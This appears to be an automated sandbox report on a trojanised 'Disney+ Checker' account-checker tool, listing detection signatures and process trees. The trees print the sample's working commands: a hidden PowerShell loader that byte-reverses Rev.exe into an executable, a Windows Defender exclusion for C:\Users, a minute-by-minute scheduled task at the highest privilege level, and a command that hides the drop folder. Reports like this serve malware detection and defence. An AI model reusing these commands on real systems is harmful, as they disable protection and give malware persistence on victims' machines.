Analysis

max time kernel: 480s
max time network: 510s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02-09-2024 08:37
Static task: static1
URLScan task: urlscan1
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run PowerShell and hide display window.
Processes:
- 5140 powershell.exe
- 5380 powershell.exe
- 5588 powershell.exe
Executes dropped EXE 2 IoCs
Processes:
- 5808 A1.exe
- 4316 FontDriverHost.exe
Loads dropped DLL 1 IoCs
Processes:
- 5808 A1.exe
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
- behavioral1/memory/5808-207-0x0000000005710000-0x0000000005934000-memory.dmp (yara rule: agile_net)
Processes:
- behavioral1/memory/6040-221-0x0000000000400000-0x000000000042A000-memory.dmp (yara rule: upx)
- behavioral1/memory/6040-225-0x0000000000400000-0x000000000042A000-memory.dmp (yara rule: upx)
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
- Disney+ Checker By PJ v1.1.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- powershell.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- A1.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- attrib.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- FontDriverHost.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- cmd.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- powershell.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- powershell.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- schtasks.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- FontDriverHost.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
- msedge.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
- msedge.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer
- msedge.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
Modifies registry class 64 IoCs
Processes: A1.exe, msedge.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
- 4316 FontDriverHost.exe
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
- 1208 msedge.exe (x2)
- 1220 msedge.exe (x2)
- 2924 identity_helper.exe (x2)
- 4520 msedge.exe (x2)
- 5140 powershell.exe (x4)
- 5380 powershell.exe (x3)
- 5588 powershell.exe (x3)
- 6124 msedge.exe (x2)
- 1692 msedge.exe (x4)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
- 5808 A1.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
Processes:
- 1220 msedge.exe (x11)
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
- 5140 powershell.exe: Token: SeDebugPrivilege
- 5380 powershell.exe: Token: SeDebugPrivilege
- 5588 powershell.exe: Token: SeDebugPrivilege
- 5396 AUDIODG.EXE: Token: 33
- 5396 AUDIODG.EXE: Token: SeIncBasePriorityPrivilege
- 5716 AUDIODG.EXE: Token: 33
- 5716 AUDIODG.EXE: Token: SeIncBasePriorityPrivilege
Suspicious use of FindShellTrayWindow 33 IoCs
Processes:
- 1220 msedge.exe (x33)
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
- 1220 msedge.exe (x24)
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
- 5808 A1.exe (x6)
Suspicious use of WriteProcessMemory 64 IoCs
Processes (64 events; repeated writes to the same target collapsed):
- PID 1220 msedge.exe wrote to memory of 116 msedge.exe
- PID 1220 msedge.exe wrote to memory of 3712 msedge.exe
- PID 1220 msedge.exe wrote to memory of 1208 msedge.exe
- PID 1220 msedge.exe wrote to memory of 4504 msedge.exe
Views/modifies file attributes 1 TTPs 1 IoCs

Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/NGsQfm1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f8b946f8,0x7ff8f8b94708,0x7ff8f8b947182⤵PID:116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:22⤵PID:3712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:82⤵PID:4504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:12⤵PID:4380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:12⤵PID:5032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:12⤵PID:4512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:82⤵PID:1872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:12⤵PID:3160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5280 /prefetch:82⤵PID:2200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:12⤵PID:1264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:12⤵PID:4564
-
-
    Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
    PID: 5984

    Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
    PID: 6092

    Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2968 /prefetch:1
    PID: 6096

    Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
    PID: 400

    Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
    PID: 3912

    Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5632 /prefetch:8
    PID: 728

    Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5644 /prefetch:8
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID: 6124

    Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3152 /prefetch:2
    - Suspicious behavior: EnumeratesProcesses
    PID: 1692
Image: C:\Windows\System32\CompPkgSrv.exe
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID: 3468

Image: C:\Windows\System32\CompPkgSrv.exe
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID: 3132

Image: C:\Windows\System32\rundll32.exe
Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
PID: 4848
Image: C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\Disney+ Checker By PJ v1.1.exe
Command line: "C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\Disney+ Checker By PJ v1.1.exe"
- System Location Discovery: System Language Discovery
PID: 1160

    Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName Microsoft.VisualBasic [String] $Config_Path = 'C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1' + '\config\config' [String] $Tool_Path = 'C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1' + '\config\config\Rev.exe' try { if ([System.IO.File]::Exists($Config_Path + '\A1.exe') -eq $true) { [System.Diagnostics.Process]::Start($Config_Path + '\A1.exe') } [String[]] $PSCommands = @('@shift /0', '@echo off', '@setlocal enableextensions', '@cd /d "%~dp0"', 'config\Config.bat') [System.Diagnostics.Process] $Proc = New-Object System.Diagnostics.Process [System.Diagnostics.ProcessStartInfo] $StartInfo = New-Object System.Diagnostics.ProcessStartInfo $StartInfo.FileName = 'cmd.exe' $StartInfo.RedirectStandardInput = $true $StartInfo.UseShellExecute = $false $StartInfo.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden $StartInfo.CreateNoWindow = $true $Proc.StartInfo = $StartInfo $Proc.Start() [System.IO.StreamWriter] $SW = $Proc.StandardInput if ($SW.BaseStream.CanWrite -eq $true) { $SW.WriteLine($PSCommands[0]) $SW.WriteLine($PSCommands[1]) $SW.WriteLine($PSCommands[2]) $SW.WriteLine($PSCommands[3]) $SW.WriteLine($PSCommands[4]) } [System.Threading.Thread]::Sleep(3000) if ([System.IO.File]::Exists($Tool_Path) -eq $true) { [Byte[]] $Rev_Bytes = [System.IO.File]::ReadAllBytes($Tool_Path) [Array]::Reverse($Rev_Bytes) [System.IO.FileStream] $FS = [System.IO.File]::Create($Config_Path + '\A1.exe') $FS.Write($Rev_Bytes, 0, $Rev_Bytes.Length) $FS.Close() $FS.Dispose() [System.IO.File]::Delete($Tool_Path) [System.Diagnostics.Process]::Start($Config_Path + '\A1.exe') } } catch { }
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 5140

        Image: C:\Windows\SysWOW64\cmd.exe
        Command line: "cmd.exe"
        - System Location Discovery: System Language Discovery
        PID: 5340

            Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users"
            - Command and Scripting Interpreter: PowerShell
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 5380

            Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell Add-MpPreference -ExclusionPath "C:\Users" -force
            - Command and Scripting Interpreter: PowerShell
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 5588

            Image: C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /create /sc minute /mo 1 /tn "Microsoft\BackEndUpdates\HostDriversUpdates" /tr "C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe" /RL HIGHEST /f
            - System Location Discovery: System Language Discovery
            - Scheduled Task/Job: Scheduled Task
            PID: 6008

            Image: C:\Windows\SysWOW64\attrib.exe
            Command line: attrib +h +s C:\Users\Admin\AppData\Roaming\BackEndUpdates
            - System Location Discovery: System Language Discovery
            - Views/modifies file attributes
            PID: 6024

            Image: C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\System\FontDriverHost.exe
            Command line: FontDriverHost.exe -pZFr2PH3k
            - System Location Discovery: System Language Discovery
            PID: 6040

        Image: C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe
        Command line: "C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
        - Modifies registry class
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of SetWindowsHookEx
        PID: 5808

            Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/SDqxsud
            PID: 6132

                Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f8b946f8,0x7ff8f8b94708,0x7ff8f8b94718
                PID: 1160
Image: C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe
Command line: C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
PID: 4316

Image: C:\Windows\system32\AUDIODG.EXE
Command line: C:\Windows\system32\AUDIODG.EXE 0x3c8 0x474
- Suspicious use of AdjustPrivilegeToken
PID: 5396

Image: C:\Windows\system32\AUDIODG.EXE
Command line: C:\Windows\system32\AUDIODG.EXE 0x3c8 0x474
- Suspicious use of AdjustPrivilegeToken
PID: 5716
Network
MITRE ATT&CK Enterprise v15
Downloads